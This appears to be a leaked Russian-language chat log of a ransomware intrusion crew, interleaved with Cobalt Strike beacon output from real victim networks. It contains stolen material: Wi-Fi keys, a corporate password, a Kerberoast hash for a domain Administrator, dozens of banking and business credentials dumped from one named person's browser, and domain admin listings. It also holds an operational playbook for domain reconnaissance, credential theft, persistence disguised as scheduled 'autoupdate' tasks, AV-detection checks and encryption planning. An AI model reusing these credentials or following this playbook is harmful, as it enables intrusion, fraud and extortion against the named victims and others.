   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . fe80::7e4c:a5ff:fef9:c2a0%11
                                       192.168.0.1

``````
Host Name: UKHOEVLT3156
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization: MatchesFashion
Product ID: 00330-52356-69234-AAOEM
Original Install Date: 11/29/2019, 12:10:04 PM
System Boot Time: 9/18/2020, 9:20:23 AM
System Manufacturer: HP
System Model: HP EliteBook 830 G6
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1600 Mhz
BIOS Version: HP R70 Ver. 01.02.01, 8/26/2019
Windows Directory: C:\windows
System Directory: C:\windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 7,998 MB
Available Physical Memory: 850 MB
Virtual Memory: Max Size: 29,502 MB
Virtual Memory: Available: 15,235 MB
Virtual Memory: In Use: 14,267 MB
Page File Location(s): C:\pagefile.sys
Domain: matches.com
Logon Server:              N/A
Hotfix(s): 5 Hotfix(s) Installed.
                           [01]: KB4514359
                           [02]: KB4513661
                           [03]: KB4515383
                           [04]: KB4516115
                           [05]: KB4515384
Network Card(s): 4 NIC(s) Installed.
                           [01]: Intel(R) Ethernet Connection (6) I219-V
                                 Connection Name: Ethernet
                                 Status: Media disconnected
                           [02]: Intel(R) Wi-Fi 6 AX200 160MHz
                                 Connection Name: WiFi
                                 DHCP Enabled: Yes
                                 DHCP Server: 192.168.0.1
                                 IP address(es)
                                 [01]: 192.168.0.80
                                 [02]: fe80::7de6:b515:bbeb:89c0
                                 [03]: fdb0:64:3df8:0:c889:fce9:a8e0:ab10
                                 [04]: 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10
                                 [05]: fdb0:64:3df8:0:7de6:b515:bbeb:89c0
                                 [06]: 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0
                           [03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
                                 Connection Name: Ethernet 2
                                 Status: Media disconnected
                           [04]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 3
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes


```systeminfo и ipconfigпо поводу интерфейсовКакие еще идеи?Все службы в названиях которых есть fortinet - запущены. Виртуальные интерфейсы фортинета - включал. Бесполезно. Домен не появляется.```

    SSID name: "rothbarguest"
    Cipher : None

    SSID name: "BA53LG"
    Cipher: CCMP
    Cipher: GCMP
    Key Content : pinkblind

    SSID name : "SKYCWVNA"
    Cipher : CCMP
    Cipher: GCMP
    Key Content : 81kwISrQXbTM

    SSID name : "home"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : jake2210boy

    SSID name : "BT-NGAFJ8"
    Cipher : CCMP
    Cipher: GCMP
    Key Content : CM3NxJT63QDiLt

    SSID name : "BTHub5-K3M6"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : 76cc939872


    SSID name : "TALKTALK-ADE727"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : AGWGA9W6

    SSID name : "BT-68A2KJ"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : VpHFa7NVYnKYub

    SSID name: "Elfordleigh"
    Cipher : CCMP
    Cipher: GCMP
    Key Content : Security12

    SSID name : "SKY94FE2"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : RBPXFQEA

    SSID name: "MF_Guest"
    Cipher: CCMP
    Cipher: GCMP
    Key Content : MatchNow
``````
Louisad
M@tches2020!
```дапоймали?а че меня можно тоже тудаhenrystreet.org конфу плздо конца недели все что имется на руках закрываем и переезжаем в новый рокет``
skytechinc.com
``@user9 - готовит сеть и до сих пор не дал мне внешний домен для конфы
@user7 - #corp-televisa-com-mx
@user8 - выдал впн
@user3 - выдал впн
@user4 - выдал впн,kznm[ ](https://mediaeveryone.com/channel/general?msg=fue3bjcmbBoFoLAFL) qтак он сдохбалли мониторите фономуважаюжесткий, получаетсянифига он@user9 занят сеткой, готовит к закрытиюмне - точно не попадалсявроде?да вроде не попадалсяу них на соларе не настроен он былменеджер паролей[ ](https://mediaeveryone.com/channel/general?msg=h4E8itvspTabEgzud) эт че?#ballymoregroup-com
были креды от двух насов, один не работал
2 бэкап сервака со снятыми листингами
искали сферу
потом отвалился
первый раз вернулся, вырубили и первый нас, переменяли пароли,отвалился
потом вернулась тачка на которой нет доступа к домену, от впна ни конфигов, ни кред, стоял кейлог, ничего не поймалналичие мп проверяли?sccy собрали браузеры со ВСЕХ компов, поролей нетуже не первый день с нимипо sccy и ballymore отпишите что сделано(напомню, впн не смогу включить без кода подтверждения, у них 2фа)было в работе sccyсесия живаяотошёл от компаДавай готов новую взятьвсм ушел?если есть что взять, то возьму, у меня чел ушёл из #corp-televisa-com-mxsccyballymore отвалилсяsccyу кого что в работе?ага+все тут?ок, нужна новая
уверен что из офиса тоже никто не заходиля, но лучше смени кобуприлично такпока я с user7
остальные опаздываюткто вообще пришел?все дома спалиу своих спросил?pawbug.comа домен?моячья коба?кто то вышел
```
01/28 12:07:45 *** sup has joined.
01/28 12:10:25 *** sup has left.
```не``
sup beacon> exit
[Tasked beacon to exit

```@tl1 это ты вышел из всех сессий в кобе 172....218?hiПривет всем приветзавтра к 5login_passwdlogin_usernameв snu.edu пытаюсь из впна выбраться
чекаю на SMBGhost и еще кучу всяких рдп эксплойтов попробовал - все мимокак там на гидре соль заказать)не разбираюсь с гидройя в #corp-televisa-com-mx пытаюсь пробиться на какую нибудь тачку@user9 на дольняк пошелразбираюсь с гидройС с гидрой как брутить веб формулибо другим спосом брутануть вебс гидрой разбираемсяsccyскажите без + чем заняты)-бруть будемвсе в sccy?++sccyкто чем занят?тут= )``
На входе мы имем обычного бота с пользовательскими правами и рассматриваем первый этап работы с этого контекста.
1. Сбор информации о домен контроллерах в сети и проверка видимости домена
	- net domain_controllers
	- net dclist
	- shell nltest /dclist:
Чаще всего хватает первой команды из трех, но если она не отдает результата - можно попробовать остальные.

2. Сбор информации о составе Active Directory при помощи AdFind.exe
	- загружаем adfind.exe и adf.bat в папку доступную для записи
	- переходим кобальт биконом в эту папку
	- запускаем shell adf.bat
	- ждем окончания работы скрипта
	- выкачиваем результат и удаляем то что загрузили на машину
```писал на основе твоего гайда)да я поняля бы мог вынести адфайн + шарфайн на первые пунктыи прочей хуйния это писал с расчетом на скип ав лабчтобы быстро перепгрынуть если найдется админ шара доступнаяможно делать периодическиshell type C:\path\output.txtто смотреть через биконесли шейрфайндер идет долгоэто в словах, щас допишу это в командах``
ENTRY POINT guide

1. Сбор первичной информации о домене и об окружении
	- Domain name
	- DCs list
	- LA\DA\EA
	- Password policy
	- PS
	- EDR
	- system info
на основе полученной инфы смотрим, что за сеть перед нами: workgroup с впн, ав лаба, рабочая сеть. Если на основе даных из шага 1 невозможно сделать вывод, переходим ко 2 шагу

2. Сбор информации об АД
	- ADFind
	- ADFind trust
если размер файлов суммарно составляет более 40мб, то необходимо положить их в архив. После анализа АД делаем вывод о типе сети. Если workgroup без видимости домена, пропускаем и берем след. сеть в работу. Если полноценная сеть, идем дальше

3. Сбор дополнительной информации о домене и об окружении
	- Дамп браузеров
	- Seatbelt
	- kerberoast, asreproast
	- DuzzleUP
	- WinPEAS
	- Watson
	- GPP
	- ShareFinder
все файлы в процессе и логи вы складываете в папку с именем внешнего домена сети, под именами соответствующим утилитам, которые вы запускали. Хеши для брута вы передаете team lead 2

4. Доп. действия. В процессе выполнения ShareFinder мы запускаем персист на входной точке (ТОЛЬКО ЕСЛИ ОБ ЭТОМ БЫЛО СКАЗАНО ЗАРАНЕЕ)
	- генерируем НОВЫЙ билд на КАЖДЫЙ запуск
	- прячем длл в пользовательких папках (желательно appdata и как можно дальше)
	- запускаем, проверяем не удалило ли длл + появилась ли штаска, пишем мне: имя хоста, права запуска

все файлы дублируются в конфу, а так же складываются в отдельную папку у вас локально
```есть конечнопроеб зачетныйдаохесть 10 мин?понимаешь какой проеб?и нашли их в вцентре блять)))их просто не трогали на локея так понял через эти esixа как они восстановились не читали?а фига себеони ищут доступы ссх в есикс + рубикдаа есть планы на тему госпиталь еще раз накрыть?))окая тебе хеш скинул сюда и написал туда чтобы ты глянул сюда)ну да, я больше и не писал)а так я ж написалтак хеш в брутчто именно чекнуть?ок секв брут пожалуйста``


TicketByteHexStream :
Hash : $krb5tgs$23$*Administrator$activedirectory.fishusa.com$MSSQLSvc/Fishusa-DC.a
                       ctivedirectory.fishusa.com:55423*$AD57FE3D3891F5A3A264DFF456950F6C$8EA98D3AB
                       C059F0EFAE4925C27EDACDD3FC613D5330AE0ED5D868BC3F009402DE5A8D2673F71142F22E7E
                       17FBF20B865DDE95661ED0A2E02564DA4263BE403CEEFA40D587CEDC9D26F40FEF13B7FC7A9C
                       624A505279BEF60B84B1D4BDBF94AF3179E5A3AC11D1ABD739B2CA1044D0F593E4B5D915551E
                       C58D27D405C6BA305AD1E92F40F67A5217F7B7DE1667E13AC325E265682438B8CD0282C04B35
                       4593455C183E69922BA97727DDAA3B910FBC253726FE5EC70D533AB1EE9A282C332A37214F5F
                       2DB2410468E4509EEA5CC450F2EE342382B3D5AE422B5B4C5DB0ED0414D50E19B78E1F4DE0E2
                       5311CAD6AC3021B49124759367B078759DDD3AADF716B104266BB5AFEBB6507515675562ABE3
                       4278CABDA26ADF17CD9AF7B7FEFE4F717235B1388112F9C43513A72127FD21449C9BDDDE8887
                       79DAC70F2FF8D83CD3C329E33AFAC731DD9224BC553430850CB37FD8DD950AA04080BE6AA165
                       51DB03D1B165C5EDBC853ECFAF1FF28A98F766F601BC964ED64560952CE86767A7104A15122A
                       90307347778F1F177C1C50E814D80DFED26A60DA4998D024CEAA298234E63B7CD35F2F9621C6
                       46F61E1B628F7278FFE78F3044D0D03B4EA1409157C6D75C12DCBA8B029950EF2539361DA38C
                       782B0720EF483A314B085CA5F6309C37F549CB24B80466B842B5B784ED014902A86BFEA6D56B
                       1782FAB1C5611E2BBF96ACF2799E6DF9C45DF66C2CB96154F8415505920EAB91909364BBB0A8
                       FFA501E2C6EB7F546D4F65C1159EA747BD94B79A3E9C3BE4E899AB5058FBA0EFE6EBFF703C95
                       7F506BF977E8F798B07BAD10D4BDE26E792660B6873599D2F0C6F33020E2A6C7EAFE5369D982
                       3A842E2B941C92EBC8996E5D9D136C334F004F0A58BBEBC3916F992C6553690F79B77ED71121
                       49EAB80EBE9CFBC20AD4CC7E2C4B3126C51F9D6CAA09FA61F567A9CC70B97FB49DC96B4DA7E2
                       F8AD8EB0E0B35EFD6CFE4F9FEF796AE3A588DBD5757FA7794A5FD7A1F67BD0D1D24BE5D6E9FE
                       718761A919C61BD8171E37509878599A3BF73A38A538C074396A5815346AA591D61014F0E1FE
                       175731E561942B5B7665BB9545DA74B6998B6B3D335FBDC8B1BA3E13168F3D95324BF8AB5B00
                       A1EC7CE50289766C14894416EA3812E6359CF70C6F474C67D360F75B68A4630DAA0433F11D76
                       69020B7D2C87FC6FDF591CC3679478B6AF15BD58415271EA71071DFE9953AD6586C7BABAB3A9
                       467C5D0181CC953ECB572474B637C7CAFC0FBE2B7FF4AA65678E36663D3302C59486364F2611
                       12E90E021CEF7210B53FD516A59BE52BEBB9563822E629C00829439E08CF6DEB5FB590796892
                       250DA5919BED1A478E00D3901FA317A5B33DB1EDA40628C32013FAD83B9A9114380D837082E2
                       DDF60F2592B6CB7BA7D5E5CA0FFA5510DB7198F1361D72670F0DCA6338B17AB3CB1F354634D8
                       00079CFA520F87DA0E712BF8F7F0885583224148B08F99EFE55A43FB438E1FB5123F5AD6AE39
                       647D31DBBE82D73281790B964459FCDC5E59DC896DFC84F9B4364164291E197324721CCD4700
                       437E8A92D28E6501BDD0C85A555C5A872818B7BDB3F0F472112F9F8CD8C3BDE634256
SamAccountName : Administrator
DistinguishedName : CN=Administrator,CN=Users,DC=activedirectory,DC=fishusa,DC=com
ServicePrincipalName : MSSQLSvc/Fishusa-DC.activedirectory.fishusa.com:55423
``лолспокидавайи ок))))тупо переименовал hook.jar в Hook.jarнезавтра буду)вобщея спать
нет силзначитжава``
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:Hook.jar -jar cobaltstrike.jar $*
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
``продублируешь...?щабля карочну дав конфу тудаи артифакт китом поправленнымс хукомновый кобальтя ж кидалбляэто на 12 яве?в таких условиях как ты чекаешь без инетана длтам 1 детектгенерить артифакт китомя ж сказалсека блять7 у нашего который в тулспанел73у нас 1 детект ващеа почему меньше то?а вот депа поймали(и детект меньше хотя был активена вот его старый стаб не поймалиа откуда деп появился опять?без инетаhttps://dyncheck.com/scan/id/535edae924db877964d784a8713f84fc стаб депа)и потом раскидать по всем рабочим станциямнету
начать серваковей и генерьтетолько в кобешелкод билдер есть свежий?и тупо проеби мб какие-то "дежурные" заметят аномалию по пкесли их всех поднять из сна, то сам лок займет прилично временитам пкесть какие-то методы работы на скорость?слушайhttp://helpdocpt.club/threads/some-cool-stuff-%D0%A1-pws-cna.38/Раз уж меня пустили в огород - откоментил часть топиков, предлагаю мои скромные ремарки внести прямо в первое сообщение чтобы не приходилось читать весь тредможно нас в чат хоть?задание на обе командысегодня до 21:00, сделаете gpj можете уйти раньшеу вас сейчас активная практика будет как раз с прицелом на повышение прав, будут попадаться кейсы где надо будет изучать новое, где стандартные методы не будут работать, и вот их как раз следует планомерно добавлятьзапутанность я думаю не проблема, это же все таки относительный такой "порядок" действий, вопрос shortcut'а тут
то есть выделения приоритетных векторов и далее вторичных и третичных - то етсь более сложных в эксплойтации и реже встречающисяв любом случае выглядит запутаннопотому что, например, предыдущий вариант диаграмы было сложно привести к вменяемому видуДля бесконечного скорее всего придётся перейти на другую платформу, либо же преподносить в ином видеданый майндмап по сути это основа всего цикла действий возможного, то есть расширять можно чуть ли не до бесконечности)дальше просто векторно развивайте с указанием используемых уязвимостей (как LPE так и сетевых)
уделите внимание MsSql вектору тожену вцелом чем дополнять я так понимаю вы и так "видите"? но начало верное, агаСейчас сделаю))только обещай без шалостеймогу свой акк датькиньте логин в ПМ пожалуйста под которым почитать можно)ремастер mind-map'а
http://helpdocpt.club/threads/mind-map-%D0%BF%D0%BE-%D1%8D%D1%81%D0%BA%D0%B0%D0%BB%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9.33/актуалочкаhttps://www.xmind.net/download/До обеда продолжаем вчераншнюю задачу по Mindmap и организации инструкций:space_invader:hiДоброе утроВсем доброе утроpcsb.org говорятможно меня в эту самую как её `pinellas.local`и мне?[ ](https://mediaeveryone.com/channel/general?msg=AwPNpZh9xSPnH2kZE) да, в лспасибоПриветможно кобу новую
мою локнули
там две сети закрывалось:space_invader:hiвключил)сделалдаВсем приветuser8 надо включить, он вернулсяhiПривет, где все?День добрыйбвсем спокойной ночизавтра к 5но так же никуда не катятда, есть там цитриксовые админыпользакигрупы - юзаки?
или сервера?другие групы попадались?В #corp-televisa-com-mx сдвинулись со входной точки
Пока ДА нет, чекнули все сервера и тачки куда есть доступ, из юзерского сегмента серверов пока удается вылезтичто за сегодня сделали?с этим пользователем можно авторизоваться только на виртуальных лабах (других тачках не удалось авторизоваться) проверил все браузеры - чисто, пароли из gppp не подошли ни к одному из пользователей доменных, кербы снял и отправил брутиться, в силтбэлте ничего не нашёл (файлы и истории браузеров), на всех тачках перепробовал все элевейты что у меня есть (буквально все даже обход уака) шарфайндер не прокатил нигдетоже чистосейчас перечекаю на этой тачке (на прошлых 2-х всё чисто)браузеры?нетне систем права?нетты ЛА?вот я и интересуюсь что можно ещё попробовать ?разве больше вариантов нет?)остаётся тогда ждать пока сбрутится хэшик сервисадмина (adfssvcadmin)да)а твой текущий доменный пользак?как проверишь отпиши в фидбэк если не работаетснимал шарфайндер?на других тачках не получается подняться, элевейт кит не подходит, что можно попробовать? пароли (4 если считать пасс актуального пользователя) что есть ни к какому аку не подходятвсе передал на брут ужеда, оба файлакербыа ты хеши отдал @tl2?пароли ЛА не подошли, элевейты не помогли, думаю перепрыгнуть на другую тачку и там попытаться поднятьсяподбираю пароль к локальному админу``
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 HSU-ADDC01 137.150.144.180
 HSU-ADDC07 137.150.146.61
 HSU-ADDC03-AZ 10.52.0.196

```сейчас так снимутул чейн не снимает ад_трастokв лс @tl2@tl1 @tl2 можно хэшик на брут``
[*] Tasked beacon to run .NET program: SharpChromium.exe logins
[+] host called home, sent: 690231 bytes
[+] received output:
[*] Beginning Google Chrome extraction.

--- Chromium Credential (User: MichaelLee) ---
URL : https://registration.tco.census.gov/myreg/change-password.jsf
Username : michaellee@missme.com
Password : MissRock90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://id-provider.tco.census.gov/nidp/saml2/sso
Username : michaellee@missme.com
Password : MissRock90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : dm1002
Password : KPN@12th

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : dm1001
Password : KPN@12th

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : deodarmichael1
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://web17.secureinternetbank.com/EBC_EBC1961/EBC1961.ashx
Username :
Password : 152994828040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 3180
Password : rock0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 3601
Password : dm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.fedex.com/en-us/home.html
Username : MissMe
Password : Sweet90058!

--- Chromium Credential (User: MichaelLee) ---
URL : https://sdg2.mastercard.com/static/private-portal-ui/
Username : Mi
Password : seoul

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : MISSMEMICHAEL
Password : !Alameda4715

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willing1
Password : 0058sweet

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willinglee
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3031olympicmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://sellercentral.amazon.com/ap/signin
Username : AndyP@missme.com
Password : 4715Missme

--- Chromium Credential (User: MichaelLee) ---
URL : https://danceandmarvel.com/index.php/oitmain
Username : michael
Password : michael1234

--- Chromium Credential (User: MichaelLee) ---
URL : https://identity.avalara.com/account/login
Username : michaellee@missme.com
Password : Miss8040*

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3019westmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 355kingsleymichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.onlinelabels.com/SignIn.aspx
Username : michaellee@missme.com
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://sdg2.mastercard.com/pkmslogin.form
Username : Michael_Lee
Password : ^RcRvMiSs90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : rcrvmichael1
Password : Rcrv8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : missmemichael1
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : d&mmichael1
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.amazon.com/ap/signin
Username : patriciachoi@missme.com
Password : graceful0619

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.costcobusinessdelivery.com/Logon
Username : soohkim@missme.com
Password : sweet7706

--- Chromium Credential (User: MichaelLee) ---
URL : https://login.bigcommerce.com/login
Username : lisakim@missme.com
Password : RRvdrr $4715

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 2987
Password : mm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : michaelmaison
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.certify.com/Login.aspx
Username : michaellee@missme.com
Password : $MissRock

--- Chromium Credential (User: MichaelLee) ---
URL : https://login.yahoo.com/account/challenge/password
Username : jclmichaellee
Password : $Holy0731

--- Chromium Credential (User: MichaelLee) ---
URL : https://accounts.shopify.com/login
Username : michaellee@missme.com
Password : MissMe8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.amazon.com/ap/signin
Username : AndyP@missme.com
Password : 4715Missme

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : rcrvmichael1
Password : Rcrv8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : d&mmichael1
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : michaelmaison
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : missmemichael1
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willinglee
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3019westmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 355kingsleymichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3031olympicmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://delsolpm.appfolio.com/connect/users/sign_in
Username : michaellee@missme.com
Password : young90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : pcho94
Password : whos90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.efax.com/myaccount/login
Username : 2132323675
Password : 1260

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : heprmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : heprmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL :
Username : michaellee@missme.com
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : pcho94
Password : whos90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://securedmail.bankofhope.com/securereader/login.jsf
Username : michaellee@missme.com
Password : spa0804?

--- Chromium Credential (User: MichaelLee) ---
URL : https://engpermits.lacity.org/public/control.cfm
Username : Michael Lee
Password : kingsley355

--- Chromium Credential (User: MichaelLee) ---
URL : https://engpermits.lacity.org/public/control.cfm
Username : michaellee@missme.com
Password : kingsley355

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : rcrvmichael1
Password : Rcrv8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 2987
Password : mm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 29873180
Password : rock0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 3180
Password : rock0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 3601
Password : dm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : michaelmaison
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : missmemichael1
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : heprmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : pcho94
Password : whos90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : willinglee
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : 3019westmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : d&mmichael1
Password : Spai8040

[*] Finished Google Chrome extraction.
``````
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 MM-DC1 192.168.1.2
 MM-DC2 192.168.1.111
 MM-DC3 192.168.1.214
``````
Teemo[HQ217]MichaelLee */13384|2020Dec22 01:33:58> shell net group "Domain Admins" /dom
[Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain MissMe.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator JasonTak MEGACOM
ThomasChang
The command completed successfully.


Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:24> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain MissMe.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator ServerAdmin$ ServerAdmin1$
ServerAdmin2$
The command completed successfully.


Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:51> shell net localgroup Administrators
[Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
megacom
megacom1
MISSME\brandonsantana
MISSME\Domain Admins
MISSME\IT_Admins
MISSME\MichaelLee
thomas
The command completed successfully.

``если с закрепами закончили то переходим к разборам-``
AnyDesk autoupdate#39932 20/01/2021 05:31:07 p. Listo
pjfrancocru sfe16537 corp.televisa.com
контекст юзера обычного непринуждённого
```ага, удаляютсяудалил, остался ?я сразу удаляля просто делаю билд и удаляю после скачивания скажу навернякаудалите последние своиудалёные лог сохраняет?ahyhaxmasakaкаких?но я по логам вижу только 2 билдавы закрепили 3 штукия снова чет не понимают к надо выбиться на другую тачку для закрепа что логичнов первую очередь отрабатываем те что с -сам закреплю у меня окпонялтакая же хрень[ ](https://mediaeveryone.com/channel/general?msg=b7uTJGwpAAPqPF7uW) и я только интеракт нажал[ ](https://mediaeveryone.com/channel/general?msg=KNnZDaj5uGyeJmFNs) через инжект в соседний процес из процеслистав плане только в другой сесси с тачкой возможно было работатьу меня такие краши только спавном и лечилиськобальт крэшитсяинтерактомкрашит как?вы там пишете спавнcedarfinancial.localbenihana.com не крепится
247InTouchPCl.local стоит минус, ты в ней чёт мутил, никто и не трогал больше
cedarfinancial.local крашит кобутут мыработаюта остальные то в сетяхну двое с закрепамигде еще 2?2 человека работают?если старый убрали - окбля я говорил @user8старый погасилdough sccy-lt04 sccy.comвы 2 билда повесили тут?[ ](https://mediaeveryone.com/channel/general?msg=KTsDPaLzaBZtfH7EX) есть[ ](https://mediaeveryone.com/channel/general?msg=xbWP52aMQTtnX34cp) как перезапустить?``
контекст юзака
dough sccy-lt04 sccy.com
Microsoft Teams autoupdate#81727 1/20/2021 6:15:52 PM Ready
```[ ](https://mediaeveryone.com/channel/general?msg=Euqwmkbt9wtAhdJid) этой нетща я перезапускаю в sccy.comмоя?3 штуки и 1 не прилетела?все?агадлл на месте?даlfстарое удалил?ребилд делал?)[ ](https://mediaeveryone.com/channel/general?msg=k5rvLkBNzcF4RimTH) Microsoft Teams autoupdate#15903 20/01/2021 05:06:56 p. Listo[ ](https://mediaeveryone.com/channel/general?msg=iqCETTGajeCX9rTuM) нетуcorp.televisia.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=qo75xSCiBZEqdcN35) есть``
контекст юзера
occdr occremote191 nk.spirit.com
Skype maintenance task#13547 1/20/2021 6:07:49 PM Ready
